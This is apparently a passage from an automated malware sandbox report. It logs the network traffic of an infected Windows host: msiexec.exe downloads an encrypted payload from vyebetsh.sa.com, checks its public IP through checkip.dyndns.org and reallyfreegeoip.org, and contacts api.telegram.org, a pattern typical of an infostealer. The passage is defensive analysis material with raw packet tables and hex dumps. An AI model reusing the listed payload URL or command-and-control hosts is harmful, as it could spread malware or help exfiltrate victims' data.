                                                                            Nov 4, 2024 07:13:38.446012020 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446028948 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446042061 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446050882 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.446079969 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.446327925 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446337938 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446350098 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446361065 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446373940 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.446393967 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.446713924 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446753025 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.446755886 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446882963 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446897984 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446909904 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446919918 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446921110 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.446932077 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.446939945 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.446957111 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.446980953 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.491075993 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.491091967 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.491102934 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.491154909 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.491178989 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.491182089 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.491194010 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.491204023 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.491229057 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.491250038 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.564429045 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.564455986 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.564481974 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.564485073 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.564507008 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.564529896 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.564560890 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.564573050 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.564583063 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:38.564601898 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:38.564623117 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:52.384197950 CET4988280192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:52.384252071 CET8049889193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:52.384432077 CET4988980192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:52.384509087 CET4988980192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:52.389270067 CET8049889193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:53.210242987 CET8049889193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:53.211431980 CET49895443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:53.211473942 CET44349895188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:53.211541891 CET49895443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:53.211735010 CET49895443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:53.211745024 CET44349895188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:53.260889053 CET4988980192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:53.810508966 CET44349895188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:53.812170982 CET49895443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:53.812216997 CET44349895188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:53.949580908 CET44349895188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:53.949709892 CET44349895188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:53.949757099 CET49895443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:53.950110912 CET49895443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:53.971695900 CET4988980192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:53.976820946 CET8049889193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:53.976878881 CET4988980192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:53.978713989 CET49901443192.168.2.5149.154.167.220
                                                                            Nov 4, 2024 07:13:53.978760004 CET44349901149.154.167.220192.168.2.5
                                                                            Nov 4, 2024 07:13:53.978820086 CET49901443192.168.2.5149.154.167.220
                                                                            Nov 4, 2024 07:13:53.979142904 CET49901443192.168.2.5149.154.167.220
                                                                            Nov 4, 2024 07:13:53.979161978 CET44349901149.154.167.220192.168.2.5
                                                                            Nov 4, 2024 07:13:54.815295935 CET44349901149.154.167.220192.168.2.5
                                                                            Nov 4, 2024 07:13:54.815397978 CET49901443192.168.2.5149.154.167.220
                                                                            Nov 4, 2024 07:13:54.817580938 CET49901443192.168.2.5149.154.167.220
                                                                            Nov 4, 2024 07:13:54.817610025 CET44349901149.154.167.220192.168.2.5
                                                                            Nov 4, 2024 07:13:54.817847013 CET44349901149.154.167.220192.168.2.5
                                                                            Nov 4, 2024 07:13:54.819397926 CET49901443192.168.2.5149.154.167.220
                                                                            Nov 4, 2024 07:13:54.863337040 CET44349901149.154.167.220192.168.2.5
                                                                            Nov 4, 2024 07:13:55.080024004 CET44349901149.154.167.220192.168.2.5
                                                                            Nov 4, 2024 07:13:55.080090046 CET44349901149.154.167.220192.168.2.5
                                                                            Nov 4, 2024 07:13:55.080162048 CET49901443192.168.2.5149.154.167.220
                                                                            Nov 4, 2024 07:13:55.082576990 CET49901443192.168.2.5149.154.167.220
                                                                            Nov 4, 2024 07:14:00.713711023 CET4982580192.168.2.5193.122.6.168
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 4, 2024 07:13:36.141813993 CET | 54734 | 53 | 192.168.2.5 | 1.1.1.1
Nov 4, 2024 07:13:36.238181114 CET | 53 | 54734 | 1.1.1.1 | 192.168.2.5
Nov 4, 2024 07:13:39.157991886 CET | 54422 | 53 | 192.168.2.5 | 1.1.1.1
Nov 4, 2024 07:13:39.167100906 CET | 53 | 54422 | 1.1.1.1 | 192.168.2.5
Nov 4, 2024 07:13:40.586250067 CET | 64607 | 53 | 192.168.2.5 | 1.1.1.1
Nov 4, 2024 07:13:40.594244003 CET | 53 | 64607 | 1.1.1.1 | 192.168.2.5
Nov 4, 2024 07:13:53.971621037 CET | 49247 | 53 | 192.168.2.5 | 1.1.1.1
Nov 4, 2024 07:13:53.978249073 CET | 53 | 49247 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 4, 2024 07:13:36.141813993 CET | 192.168.2.5 | 1.1.1.1 | 0x38cf | Standard query (0) | vyebetsh.sa.com | A (IP address) | IN (0x0001) | false
Nov 4, 2024 07:13:39.157991886 CET | 192.168.2.5 | 1.1.1.1 | 0xb6cd | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Nov 4, 2024 07:13:40.586250067 CET | 192.168.2.5 | 1.1.1.1 | 0x3b19 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Nov 4, 2024 07:13:53.971621037 CET | 192.168.2.5 | 1.1.1.1 | 0x97e4 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 4, 2024 07:13:36.238181114 CET | 1.1.1.1 | 192.168.2.5 | 0x38cf | No error (0) | vyebetsh.sa.com | | 141.98.10.40 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 07:13:39.167100906 CET | 1.1.1.1 | 192.168.2.5 | 0xb6cd | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 4, 2024 07:13:39.167100906 CET | 1.1.1.1 | 192.168.2.5 | 0xb6cd | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 07:13:39.167100906 CET | 1.1.1.1 | 192.168.2.5 | 0xb6cd | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 07:13:39.167100906 CET | 1.1.1.1 | 192.168.2.5 | 0xb6cd | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 07:13:39.167100906 CET | 1.1.1.1 | 192.168.2.5 | 0xb6cd | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 07:13:39.167100906 CET | 1.1.1.1 | 192.168.2.5 | 0xb6cd | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 07:13:40.594244003 CET | 1.1.1.1 | 192.168.2.5 | 0x3b19 | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 07:13:40.594244003 CET | 1.1.1.1 | 192.168.2.5 | 0x3b19 | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 07:13:53.978249073 CET | 1.1.1.1 | 192.168.2.5 | 0x97e4 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• vyebetsh.sa.com
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49787 | 141.98.10.40 | 80 | 1128 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Nov 4, 2024 07:13:36.248771906 CET | 175 | OUT | GET /nMcrGmhC252.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: vyebetsh.sa.com
Cache-Control: no-cache
Nov 4, 2024 07:13:37.121876001 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 04 Nov 2024 06:13:36 GMT
Server: Apache
Last-Modified: Sun, 03 Nov 2024 23:42:54 GMT
Accept-Ranges: bytes
Content-Length: 275008
Content-Type: application/octet-stream
Data Raw: 88 13 7d 5b 16 ab d7 65 81 df 0b d4 53 30 68 5a 6c fd 43 c7 70 57 b5 57 c9 35 fe 9b 77 d8 5f cb bc cf 64 b6 66 ad 7d a7 92 68 32 a2 6e bc 75 6c 43 82 28 f3 a2 43 96 86 8e 1f eb 78 81 f9 3f 8b 66 de c7 02 f1 15 73 19 44 38 64 36 63 7f 7f 67 22 6a 96 24 15 36 a2 89 84 ee 78 06 e9 af 87 85 75 02 c3 0b 5a 8e dc 65 11 bf 81 47 5b 20 91 07 42 40 0c cf c5 b6 c4 42 89 b1 49 ff f1 9d e6 a1 32 51 f0 3e 72 f1 c6 8c d2 20 b9 0e a6 f7 14 c9 53 bd 54 95 5a ed 34 d5 29 cc c4 67 00 08 af 6a 0c 2c 4c fd 03 77 8e b0 df 50 77 ed 18 cd 5d b0 b7 6a 8b 96 bf 85 62 49 32 03 47 b7 37 13 5d f9 5d bb 1a b7 6b 2d 8c 51 63 b7 3e 29 64 f6 76 48 62 b6 64 a6 ff 4d 30 21 9a d3 a2 69 18 44 89 44 2e 5b 93 63 3d 7d 8b f6 73 99 f3 dd 1c 88 55 c4 83 50 97 62 fa 0d fc de 62 6d 8d a3 f7 30 53 54 60 1c 08 e7 c5 d0 8b fb e7 a9 65 ea 83 c8 06 bc 4c 05 e4 11 81 28 a4 77 fa 37 76 95 99 39 e3 08 07 94 44 30 c3 d4 d0 76 83 6c a3 5d a6 1b 53 03 5e bc 28 ef 19 33 f5 5a 4f 88 8e 6e 53 fc 5e 66 94 10 52 dc b3 26 3e 2c 75 16 49 93 cf 1b 2d e8 ee 89 [TRUNCATED]
Data Ascii: }[eS0hZlCpWW5w_df}h2nulC(Cx?fsD8d6cg"j$6xuZeG[ B@BI2Q>r STZ4)gj,LwPw]jbI2G7]]k-Qc>)dvHbdM0!iDD.[c=}sUPbbm0ST`eL(w7v9D0vl]S^(3ZOnS^fR&>,uI-FLL$R&ahmwJ+G8_V;kBkiVXJf$x-5z,6YP1n~g;s[Az(FF;qaYv,JzLGm-?u5M^ R68AY?aLt[Z}9!\!nz&k_/vwS9 |v<p,%_Q'YBaFWDh{vJWY7r@tV=[2j^_W'XI*qE57W'$/|dGsi4]iOrM(N3XTe(StPL} }LZi6jzt]FT;8x63=SK7|%M=D#}f48RTWybACib+z{O 5l"o)IK-Q[GM1H]i_1VfNXd.dHV [TRUNCATED]
Nov 4, 2024 07:13:37.121886969 CET | 212 | IN | Data Raw: de 44 ef 6f 01 e3 56 23 71 e2 96 cd 87 ca 22 c1 dd 21 ac e5 9d 7e 89 df 34 86 b9 17 e9 93 77 68 e7 5b 68 6f dc 8e 8e c6 19 6e 92 c4 ae 7a 43 2d ff ba a8 84 05 47 dd 0c c4 26 84 ad ef 7e 76 e1 8d f9 d3 ea 9a b3 1c 74 a7 af 27 39 d8 86 f6 ae 6c 2d
Data Ascii: DoV#q"!~4wh[honzC-G&~vt'9l-Lc"5*i[mK,49[|\ohF=lDmI6<Ndh0\fd:7E(eSZ> ,AjCB1Rn39!&GH
Nov 4, 2024 07:13:37.121911049 CET | 1236 | IN | Data Raw: 10 98 67 93 6b a6 1a a6 f6 ba 07 45 f7 f3 90 bb 52 f1 b6 e1 fa 60 ac 89 fb 53 a4 6e 53 9d 4e 92 d0 e8 83 f1 71 eb ac 80 76 8e 0d 88 91 e2 eb 31 b6 7c 4c 0d 84 55 01 8f 9b 73 19 44 12 42 34 e7 2c 7f 67 9e 41 96 0e 37 34 a1 f4 68 ee 78 02 c3 89 85
Data Ascii: gkER`SnSNqv1|LUsDB4,gA74hxqG[ -dBwaikrH<J`p>`ABABGat,u3eM/Z-C&K'SOOd\n`I jeD*eaF>V7f+M2yv
Nov 4, 2024 07:13:37.121918917 CET | 212 | IN | Data Raw: ad 1a ac 8b 30 07 45 e2 f1 f8 cf d7 f1 b2 ef fb 46 aa a1 f8 3d 1b 6f 53 92 64 b4 d0 e5 80 8c f0 eb d2 8e 5c a8 09 80 b9 9f 7c 1b b6 6b 56 2a 84 5c 02 f2 15 7c 19 40 29 64 1e 82 80 7f 61 90 41 96 22 3f 36 b1 b9 c7 ee 10 02 e9 af 8f 85 75 13 b0 4e
Data Ascii: 0EF=oSd\|kV*\|@)daA"?6uNZM3A[SBJ$BI{<HJC7EKBm3:~SHal)x(P@7\oC47W?'_Q8{dpHde ]XNwc;}
Nov 4, 2024 07:13:37.121973038 CET | 1236 | IN | Data Raw: f8 b3 ad a2 fd f5 26 a8 55 c2 83 63 d6 62 fa 07 94 e2 62 4d 8b a3 85 ab 53 54 14 9c 11 e7 c5 d4 f9 a1 e2 a9 15 6a 99 c8 06 b8 3f c3 e0 11 8b aa b8 77 fa 33 5e d2 9b 39 a9 0d 19 94 54 34 b1 98 d1 76 f3 ec ac 5d a6 0f 21 59 5f bc 58 6f 23 33 f5 5e
Data Ascii: &UcbbMSTj?w3^9T4v]!Y_Xo#3^=n#|rf/$&NXVM/ztFH>&WRt$hLj}CNYUr8-/rT;noaiVRb/$rmF/7BZZ~
Nov 4, 2024 07:13:37.122049093 CET | 212 | IN | Data Raw: 8d 1c a8 5f ce fd 00 93 62 fe 06 bb f2 65 4a 8b cc a6 32 53 5e 66 9c 18 e7 c5 d4 f5 eb e3 a9 61 e1 84 e4 01 bb 4a ea b2 11 81 20 8e 64 ca 35 76 a1 9b 39 a3 9d 07 94 45 24 3d c2 ab 76 83 6a c0 0d a6 0b 59 09 20 ad 28 ef 0d 38 f2 76 48 8f 88 01 02
Data Ascii: _beJ2S^faJ d5v9E$=vjY (8vH^lG"@=uVI'*}[FJ?$@!ykjPwX+@>V+hmBc!VR4u$|;
Nov 4, 2024 07:13:37.122057915 CET | 1236 | IN | Data Raw: ac bf 9f 0a 50 f1 15 de b9 0b 87 e2 0c a8 40 94 f4 96 11 d4 a2 ed b8 d2 0d 57 39 ad 47 aa cf fc ce c6 63 39 27 4b ce fe 15 3f 50 86 d6 46 ac d5 31 b1 77 61 8f 98 14 9f f9 f0 5e 70 d8 7d 4a a5 80 78 99 58 47 d8 69 53 e3 8f 93 f0 58 1d 7a b6 82 95
Data Ascii: P@W9Gc9'K?PF1wa^p}JxXGiSXz'ZT%6>A_najLpxNZyt7\\Ez(&}b;p}wU9^jv8\C%_Q1]E%>+vZWX 6r|V;jQ8jI
Nov 4, 2024 07:13:37.122066975 CET | 1236 | IN | Data Raw: f1 11 aa a0 78 ee e6 07 a5 67 e1 9b 9a 7e f6 8a be b2 f8 14 74 3d bf 75 82 9b fc de cc 70 2f 21 b2 ba 23 12 3f 26 dd d3 46 ac d5 13 86 63 61 85 90 19 f7 a5 f7 59 7c c5 b6 40 a5 fa 08 7e 4b 47 a8 65 05 be 8f 93 fe 3c 6b 56 b1 8f 93 d1 e8 b2 ae 27
Data Ascii: xg~t=up/!#?&FcaY|@~KGe<kV'cD".?RS;=hJptZn1sGp b vwC9vyq,y%_QHSBl$(#vYQJFsH~h2T_
Nov 4, 2024 07:13:37.122076988 CET | 1236 | IN | Data Raw: db e6 07 a5 03 03 f3 90 74 95 a7 fc b7 ee 0f 63 2d b3 5b 3b cf fc d4 c6 64 39 37 da 5a 7a 15 35 56 f2 9e 29 3f df 3b c5 63 66 e0 08 1f 98 df e4 5f 74 9f b9 4a a5 80 69 1e 64 c8 d8 6d 27 e6 89 82 f3 45 0b 51 3f ec fc 42 e5 c0 10 42 ea 13 d0 c3 a5
Data Ascii: tc-[;d97Zz5V)?;cf_tJidm'EQ?BB7K5-*A6ZiAY?xMg6Y-} Ve;Ig){SS*v~SGp8,%N@",xJ1-7JWX4'~W:<
Nov 4, 2024 07:13:37.122086048 CET | 636 | IN | Data Raw: 93 f3 9a 72 81 d0 29 bc f8 6e 08 94 ad 73 a0 c2 8e 84 c7 63 58 20 b1 c1 15 a5 3f 56 ff 95 41 87 c7 2a c8 0c d0 8f 9c 15 ec aa f7 59 77 a4 24 5b ad e5 c8 19 4c 4d cb 69 2d e6 88 fc 47 53 1a 5c a2 8c 82 dd c8 1b c4 3a 8f 14 a5 dc a8 d1 01 c5 57 01
Data Ascii: r)nscX ?VA*Yw$[LMi-GS\:W S78_iY5h0J^GZP1\VoR(cmc*v?wS9Sv6v:%_@[3W7AvaH,JWY"moP*1lQXt8X
Nov 4, 2024 07:13:37.128184080 CET | 1236 | IN | Data Raw: b3 ad 9a a2 18 0a 9c 02 27 3d ac b4 84 e4 66 5f 31 7a 99 13 87 c1 0a 88 9c ae 5b 0c b7 ba 70 30 55 6d f9 b4 49 2f 34 3f 5a ff 34 54 72 62 f7 98 af 76 e7 90 c5 40 9a e7 84 97 e9 72 34 46 be 53 41 8d 5c cd 41 e5 7b b5 df 3e 17 16 f2 f5 2b 2a f6 fc
Data Ascii: '=f_1z[p0UmI/4?Z4Trbv@r4FSA\A{>+*JR:VJI7bITUT@-,Adi8?"^U+>"Uxv7wU)B3/DoSn?hz%P+]Y\8d4Vj$6x]ujY[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49804 | 193.122.6.168 | 80 | 1128 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Nov 4, 2024 07:13:39.182477951 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 4, 2024 07:13:40.020806074 CET | 323 | IN | HTTP/1.1 200 OK
Date: Mon, 04 Nov 2024 06:13:39 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: df7ccbf0bccd074fa7aacd64e92998a6
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>
Nov 4, 2024 07:13:40.023854971 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 4, 2024 07:13:40.269002914 CET | 323 | IN | HTTP/1.1 200 OK
Date: Mon, 04 Nov 2024 06:13:40 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: dd525812bc8ca693c77029e2da2e361a
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>
Nov 4, 2024 07:13:40.500725031 CET | 323 | IN | HTTP/1.1 200 OK
Date: Mon, 04 Nov 2024 06:13:40 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: dd525812bc8ca693c77029e2da2e361a
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>
Nov 4, 2024 07:13:41.532917023 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 4, 2024 07:13:41.780272961 CET | 323 | IN | HTTP/1.1 200 OK
Date: Mon, 04 Nov 2024 06:13:41 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: eea125fce00d53547f07fd3860791703
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49825 | 193.122.6.168 | 80 | 1128 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Nov 4, 2024 07:13:42.535563946 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 4, 2024 07:13:43.368520975 CET | 323 | IN | HTTP/1.1 200 OK
Date: Mon, 04 Nov 2024 06:13:43 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 8e61c9d38de0ea0d5f6a51beed6fd7db
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.549834193.122.6.168801128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 4, 2024 07:13:44.146894932 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Nov 4, 2024 07:13:44.988532066 CET323INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:44 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 1895bb71d7db0528553964d8322fd88f
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                            Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49846 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 1128 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp: Nov 4, 2024 07:13:45.963639021 CET | Bytes transferred: 151 | Direction: OUT | Data: GET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Timestamp: Nov 4, 2024 07:13:46.798877001 CET | Bytes transferred: 323 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:46 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 53291c1bd387504afcd737fa0c70b98f
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                            Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49858 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 1128 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp: Nov 4, 2024 07:13:47.565109015 CET | Bytes transferred: 151 | Direction: OUT | Data: GET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Timestamp: Nov 4, 2024 07:13:48.409867048 CET | Bytes transferred: 323 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:48 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
